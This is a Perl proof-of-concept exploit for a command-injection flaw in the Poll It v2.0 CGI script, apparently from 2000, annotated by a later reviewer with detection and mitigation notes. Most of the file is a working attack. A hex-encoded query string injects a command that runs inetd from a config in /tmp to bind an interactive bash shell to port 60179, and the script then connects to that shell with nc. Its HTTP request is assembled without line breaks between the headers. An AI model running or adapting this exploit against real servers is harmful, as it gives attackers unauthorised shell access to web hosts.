#!/usr/bin/perl -w
## Poll It v2.0 CGI / Proof of Concept Exploit.
##
## The flaw in Poll It v2.0 has supposedly been
## used in many of the latest defacements.
##
## Credit to Elias Levy for explaining how the
## CGI script could be exploited in his post to
## Bugtraq. Thanks to Chris Gunso for tips and
## testing.
##
## The exploit will bind a shell to port 60179
## (fido) using inetd.
##
## Written by teleh0r@doglover.com / anno 2000
#
# Reviewer notes (defensive reading of this historical PoC):
#   - Vulnerability class: an unsanitised CGI parameter reaching a
#     shell.  The query string built below ends the poll_options value
#     with "|" (0x7c); that is the signature of a two-argument open()
#     in the target script being handed request data, which Perl then
#     runs as a command -- TODO(review): confirm against the vulnerable
#     pollit source, this file only shows the client side.
#   - Detection: the web-server access log will carry a GET to the poll
#     script whose query string contains "poll_options=" followed by
#     shell metacharacters and the path /tmp/.hass; on the host, an
#     inetd started with a configuration file under /tmp and an
#     unexpected listener on tcp/60179.
#   - Mitigation on the server side: never pass request data to
#     two-argument open(), system() or backticks; use three-argument
#     open() / list-form system(), validate input against an anchored
#     regex, and run CGI under a least-privilege account.

use strict;
use Socket;

# Exactly one positional argument is expected: the host to contact.
if (@ARGV < 1) {
    print("Usage: $0 <target>\n");
    exit(1);
}

my($target,$agent,$evilcode,$sploit,$iaddr,
   $paddr,$proto);

$target = $ARGV[0];

# NOTE(review): the script name printed here (/cgi-bin/pollit.pl)
# differs from the one actually requested further down
# (/cgi-bin/poll.cgi); the author's comment at the end of the payload
# already says both may need adjusting.
print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/pollit.pl\n");

# Fixed User-Agent sent with the request -- a convenient log-search key.
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# echo '60179 stream tcp nowait nobody /bin/bash bash -i' >
# /tmp/.hass; /usr/sbin/inetd /tmp/.hass
#
# The hex string below is the URL-encoded query string that carries
# the command above: admin_password and entered_password fields,
# action=add_option, add_option=1, and poll_options=<command> with
# spaces encoded as "+" and a trailing "|".  The hex escaping only
# obscures the payload for a reader of this file; on the wire it is
# plain text, so log inspection sees the decoded form.
$evilcode =
# Poll It v2.0 CGI Portbinding CGI code (TM) / heh
"\x61\x64\x6d\x69\x6e\x5f\x70\x61\x73\x73\x77\x6f\x72".
"\x64\x3d\x68\x61\x73\x73\x26\x65\x6e\x74\x65\x72\x65".
"\x64\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x68\x61".
"\x73\x73\x26\x61\x63\x74\x69\x6f\x6e\x3d\x61\x64\x64".
"\x5f\x6f\x70\x74\x69\x6f\x6e\x26\x61\x64\x64\x5f\x6f".
"\x70\x74\x69\x6f\x6e\x3d\x31\x26\x70\x6f\x6c\x6c\x5f".
"\x6f\x70\x74\x69\x6f\x6e\x73\x3d\x65\x63\x68\x6f\x2b".
"\x27\x36\x30\x31\x37\x39\x2b\x73\x74\x72\x65\x61\x6d".
"\x2b\x74\x63\x70\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e".
"\x6f\x62\x6f\x64\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61".
"\x73\x68\x2b\x62\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e".
"\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f".
"\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74".
"\x64\x2b\x2f\x74\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c";

# You may have to change both the path to the script,
# as well as the name of the script name.

# Raw HTTP/1.0 request.  The payload travels in the query string of a
# GET, so the full decoded command lands verbatim in the access log.
$sploit = "GET /cgi-bin/poll.cgi?$evilcode HTTP/1.0 Connection: close User-Agent: $agent Host: $target Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8";

# Plain TCP to port 80 through a bareword filehandle (SOCKET).
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
# One send, then the socket is closed without reading the reply; the
# script never learns whether the server accepted the request.
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5);
# $target comes straight from @ARGV and is interpolated unquoted into
# a shell command line here (and into the Host: header above) with no
# validation; it is trusted only because the operator typed it.
system("nc -w 10 $target 60179");
exit(0);